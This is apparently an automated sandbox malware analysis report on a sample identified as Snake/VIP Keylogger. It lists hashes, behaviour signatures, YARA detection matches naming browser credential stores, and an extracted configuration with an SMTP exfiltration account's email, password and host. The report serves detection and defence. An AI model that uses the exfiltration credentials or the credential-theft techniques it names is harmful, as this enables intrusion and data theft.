Edit tour

Windows Analysis Report
vnV17JImCH.exe

Overview

General Information

Sample name:	vnV17JImCH.exe renamed because original name is a hash value
Original sample name:	5c68b2915de0bd72f32898d3eeefb4349f973863b78e5bf74c6db1ec94c29344.exe
Analysis ID:	1588300
MD5:	01f9c9f129a9de9d594addb7c32d194d
SHA1:	5a6939cfb1c3d920864c9d996da223f0f3eee59f
SHA256:	5c68b2915de0bd72f32898d3eeefb4349f973863b78e5bf74c6db1ec94c29344
Tags:	exeRedLineStealeruser-adrian__luca
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

vnV17JImCH.exe (PID: 6576 cmdline: "C:\Users\user\Desktop\vnV17JImCH.exe" MD5: 01F9C9F129A9DE9D594ADDB7C32D194D)

svchost.exe (PID: 6636 cmdline: "C:\Users\user\Desktop\vnV17JImCH.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "nedusnke@grupokoman.com", "Password": "LKDS6_DcR%g3", "Host": "mail.grupokoman.com", "Port": "587", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "nedusnke@grupokoman.com", "Password": "LKDS6_DcR%g3", "Host": "mail.grupokoman.com", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.4802248742.0000000000400000.00000040.80000000.00040000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 13 88 44 24 2B 88 44 24 2F B0 E2 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000002.00000002.4807310402.0000000007BE0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.4807310402.0000000007BE0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000002.00000002.4807310402.0000000007BE0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000002.00000002.4807310402.0000000007BE0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000002.4807032364.0000000007B40000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.4807032364.0000000007B40000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000002.00000002.4807032364.0000000007B40000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000002.00000002.4807032364.0000000007B40000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000002.4807032364.0000000007B40000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35743:$a1: get_encryptedPassword 0x35717:$a2: get_encryptedUsername 0x357db:$a3: get_timePasswordChanged 0x356f3:$a4: get_passwordField 0x35759:$a5: set_encryptedPassword 0x35526:$a7: get_logins 0x30e64:$a10: KeyLoggerEventArgs 0x30e33:$a11: KeyLoggerEventArgsEventHandler 0x355fa:$a13: _encryptedPassword
00000002.00000002.4807032364.0000000007B40000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3f496:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3eb39:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ed96:$a4: \Orbitum\User Data\Default\Login Data 0x3f775:$a5: \Kometa\User Data\Default\Login Data
00000002.00000002.4807032364.0000000007B40000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x332cf:$s1: UnHook 0x3326b:$s2: SetHook 0x332a4:$s3: CallNextHook 0x33233:$s4: _hook
00000002.00000002.4805427544.0000000006303000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.4807310402.0000000007BE0000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x34823:$a1: get_encryptedPassword 0x347f7:$a2: get_encryptedUsername 0x348bb:$a3: get_timePasswordChanged 0x347d3:$a4: get_passwordField 0x34839:$a5: set_encryptedPassword 0x34606:$a7: get_logins 0x2ff44:$a10: KeyLoggerEventArgs 0x2ff13:$a11: KeyLoggerEventArgsEventHandler 0x346da:$a13: _encryptedPassword
00000000.00000002.2361531765.0000000002530000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 13 88 44 24 2B 88 44 24 2F B0 E2 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
00000002.00000002.4807310402.0000000007BE0000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3e576:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3dc19:$a3: \Google\Chrome\User Data\Default\Login Data 0x3de76:$a4: \Orbitum\User Data\Default\Login Data 0x3e855:$a5: \Kometa\User Data\Default\Login Data
00000002.00000002.4807310402.0000000007BE0000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x323af:$s1: UnHook 0x3234b:$s2: SetHook 0x32384:$s3: CallNextHook 0x32313:$s4: _hook
00000002.00000003.2357967524.000000000326E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.2357967524.000000000326E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000002.00000003.2357967524.000000000326E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000002.00000003.2357967524.000000000326E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000003.2357967524.000000000326E000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35743:$a1: get_encryptedPassword 0x35717:$a2: get_encryptedUsername 0x357db:$a3: get_timePasswordChanged 0x356f3:$a4: get_passwordField 0x35759:$a5: set_encryptedPassword 0x35526:$a7: get_logins 0x30e64:$a10: KeyLoggerEventArgs 0x30e33:$a11: KeyLoggerEventArgsEventHandler 0x355fa:$a13: _encryptedPassword
00000002.00000003.2357967524.000000000326E000.00000004.00000020.00020000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3f496:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3eb39:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ed96:$a4: \Orbitum\User Data\Default\Login Data 0x3f775:$a5: \Kometa\User Data\Default\Login Data
00000002.00000003.2357967524.000000000326E000.00000004.00000020.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x332cf:$s1: UnHook 0x3326b:$s2: SetHook 0x332a4:$s3: CallNextHook 0x33233:$s4: _hook
00000002.00000002.4803380705.0000000003374000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.4803380705.0000000003374000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000002.00000002.4803380705.0000000003374000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000002.4803380705.0000000003374000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35751:$a1: get_encryptedPassword 0x35725:$a2: get_encryptedUsername 0x357e9:$a3: get_timePasswordChanged 0x35701:$a4: get_passwordField 0x35767:$a5: set_encryptedPassword 0x35534:$a7: get_logins 0x30e72:$a10: KeyLoggerEventArgs 0x30e41:$a11: KeyLoggerEventArgsEventHandler 0x35608:$a13: _encryptedPassword
00000002.00000002.4804087692.0000000005383000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.4804087692.0000000005281000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: svchost.exe PID: 6636	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: svchost.exe PID: 6636	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: svchost.exe PID: 6636	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: svchost.exe PID: 6636	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x358c2:$a1: get_encryptedPassword 0x43674:$a1: get_encryptedPassword 0xdb537:$a1: get_encryptedPassword 0x2d1efa:$a1: get_encryptedPassword 0x35896:$a2: get_encryptedUsername 0x43648:$a2: get_encryptedUsername 0xdb50b:$a2: get_encryptedUsername 0x2d1ece:$a2: get_encryptedUsername 0x3595a:$a3: get_timePasswordChanged 0x4370c:$a3: get_timePasswordChanged 0xdb5cf:$a3: get_timePasswordChanged 0x2d1f92:$a3: get_timePasswordChanged 0x35872:$a4: get_passwordField 0x43624:$a4: get_passwordField 0xdb4e7:$a4: get_passwordField 0x2d1eaa:$a4: get_passwordField 0x358d8:$a5: set_encryptedPassword 0x4368a:$a5: set_encryptedPassword 0xdb54d:$a5: set_encryptedPassword 0x2d1f10:$a5: set_encryptedPassword 0x356ae:$a7: get_logins
Click to see the 29 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.svchost.exe.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 13 88 44 24 2B 88 44 24 2F B0 E2 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
2.2.svchost.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 13 88 44 24 2B 88 44 24 2F B0 E2 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
2.3.svchost.exe.326e000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.3.svchost.exe.326e000.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.3.svchost.exe.326e000.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.3.svchost.exe.326e000.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.3.svchost.exe.326e000.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35743:$a1: get_encryptedPassword 0x35717:$a2: get_encryptedUsername 0x357db:$a3: get_timePasswordChanged 0x356f3:$a4: get_passwordField 0x35759:$a5: set_encryptedPassword 0x35526:$a7: get_logins 0x30e64:$a10: KeyLoggerEventArgs 0x30e33:$a11: KeyLoggerEventArgsEventHandler 0x355fa:$a13: _encryptedPassword
2.3.svchost.exe.326e000.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3f496:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3eb39:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ed96:$a4: \Orbitum\User Data\Default\Login Data 0x3f775:$a5: \Kometa\User Data\Default\Login Data
2.3.svchost.exe.326e000.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x332cf:$s1: UnHook 0x3326b:$s2: SetHook 0x332a4:$s3: CallNextHook 0x33233:$s4: _hook
2.2.svchost.exe.7be0000.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.svchost.exe.7be0000.4.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.svchost.exe.7be0000.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.svchost.exe.7b40f20.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.svchost.exe.7b40f20.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.2.svchost.exe.7b40f20.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.svchost.exe.7b40f20.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.svchost.exe.7b40f20.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x34823:$a1: get_encryptedPassword 0x347f7:$a2: get_encryptedUsername 0x348bb:$a3: get_timePasswordChanged 0x347d3:$a4: get_passwordField 0x34839:$a5: set_encryptedPassword 0x34606:$a7: get_logins 0x2ff44:$a10: KeyLoggerEventArgs 0x2ff13:$a11: KeyLoggerEventArgsEventHandler 0x346da:$a13: _encryptedPassword
2.2.svchost.exe.7b40f20.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3e576:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3dc19:$a3: \Google\Chrome\User Data\Default\Login Data 0x3de76:$a4: \Orbitum\User Data\Default\Login Data 0x3e855:$a5: \Kometa\User Data\Default\Login Data
2.2.svchost.exe.7b40f20.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x323af:$s1: UnHook 0x3234b:$s2: SetHook 0x32384:$s3: CallNextHook 0x32313:$s4: _hook
2.2.svchost.exe.7be0000.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x32c23:$a1: get_encryptedPassword 0x32bf7:$a2: get_encryptedUsername 0x32cbb:$a3: get_timePasswordChanged 0x32bd3:$a4: get_passwordField 0x32c39:$a5: set_encryptedPassword 0x32a06:$a7: get_logins 0x2e344:$a10: KeyLoggerEventArgs 0x2e313:$a11: KeyLoggerEventArgsEventHandler 0x32ada:$a13: _encryptedPassword
2.2.svchost.exe.7be0000.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c976:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3c019:$a3: \Google\Chrome\User Data\Default\Login Data 0x3c276:$a4: \Orbitum\User Data\Default\Login Data 0x3cc55:$a5: \Kometa\User Data\Default\Login Data
2.2.svchost.exe.7be0000.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x307af:$s1: UnHook 0x3074b:$s2: SetHook 0x30784:$s3: CallNextHook 0x30713:$s4: _hook
0.2.vnV17JImCH.exe.2530000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 13 88 44 24 2B 88 44 24 2F B0 E2 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
2.2.svchost.exe.7b40f20.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.svchost.exe.7b40f20.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.svchost.exe.7b40f20.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.svchost.exe.7b40f20.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x32c23:$a1: get_encryptedPassword 0x32bf7:$a2: get_encryptedUsername 0x32cbb:$a3: get_timePasswordChanged 0x32bd3:$a4: get_passwordField 0x32c39:$a5: set_encryptedPassword 0x32a06:$a7: get_logins 0x2e344:$a10: KeyLoggerEventArgs 0x2e313:$a11: KeyLoggerEventArgsEventHandler 0x32ada:$a13: _encryptedPassword
2.2.svchost.exe.7b40f20.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c976:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3c019:$a3: \Google\Chrome\User Data\Default\Login Data 0x3c276:$a4: \Orbitum\User Data\Default\Login Data 0x3cc55:$a5: \Kometa\User Data\Default\Login Data
2.2.svchost.exe.7b40f20.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x307af:$s1: UnHook 0x3074b:$s2: SetHook 0x30784:$s3: CallNextHook 0x30713:$s4: _hook
2.2.svchost.exe.7be0000.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.svchost.exe.7be0000.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.2.svchost.exe.7be0000.4.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.svchost.exe.7be0000.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.svchost.exe.7be0000.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x34823:$a1: get_encryptedPassword 0x347f7:$a2: get_encryptedUsername 0x348bb:$a3: get_timePasswordChanged 0x347d3:$a4: get_passwordField 0x34839:$a5: set_encryptedPassword 0x34606:$a7: get_logins 0x2ff44:$a10: KeyLoggerEventArgs 0x2ff13:$a11: KeyLoggerEventArgsEventHandler 0x346da:$a13: _encryptedPassword
2.2.svchost.exe.7be0000.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3e576:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3dc19:$a3: \Google\Chrome\User Data\Default\Login Data 0x3de76:$a4: \Orbitum\User Data\Default\Login Data 0x3e855:$a5: \Kometa\User Data\Default\Login Data
2.2.svchost.exe.7be0000.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x323af:$s1: UnHook 0x3234b:$s2: SetHook 0x32384:$s3: CallNextHook 0x32313:$s4: _hook
2.2.svchost.exe.7b40000.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.svchost.exe.7b40000.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.2.svchost.exe.7b40000.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.svchost.exe.7b40000.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.svchost.exe.7b40000.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35743:$a1: get_encryptedPassword 0x35717:$a2: get_encryptedUsername 0x357db:$a3: get_timePasswordChanged 0x356f3:$a4: get_passwordField 0x35759:$a5: set_encryptedPassword 0x35526:$a7: get_logins 0x30e64:$a10: KeyLoggerEventArgs 0x30e33:$a11: KeyLoggerEventArgsEventHandler 0x355fa:$a13: _encryptedPassword
2.2.svchost.exe.7b40000.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3f496:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3eb39:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ed96:$a4: \Orbitum\User Data\Default\Login Data 0x3f775:$a5: \Kometa\User Data\Default\Login Data
2.2.svchost.exe.7b40000.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x332cf:$s1: UnHook 0x3326b:$s2: SetHook 0x332a4:$s3: CallNextHook 0x33233:$s4: _hook
2.3.svchost.exe.326ef20.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.3.svchost.exe.326ef20.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.3.svchost.exe.326ef20.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.3.svchost.exe.326ef20.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x32c23:$a1: get_encryptedPassword 0x32bf7:$a2: get_encryptedUsername 0x32cbb:$a3: get_timePasswordChanged 0x32bd3:$a4: get_passwordField 0x32c39:$a5: set_encryptedPassword 0x32a06:$a7: get_logins 0x2e344:$a10: KeyLoggerEventArgs 0x2e313:$a11: KeyLoggerEventArgsEventHandler 0x32ada:$a13: _encryptedPassword
2.3.svchost.exe.326ef20.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c976:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3c019:$a3: \Google\Chrome\User Data\Default\Login Data 0x3c276:$a4: \Orbitum\User Data\Default\Login Data 0x3cc55:$a5: \Kometa\User Data\Default\Login Data
2.3.svchost.exe.326ef20.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x307af:$s1: UnHook 0x3074b:$s2: SetHook 0x30784:$s3: CallNextHook 0x30713:$s4: _hook
2.2.svchost.exe.3374f2e.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.svchost.exe.3374f2e.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.2.svchost.exe.3374f2e.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.svchost.exe.3374f2e.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
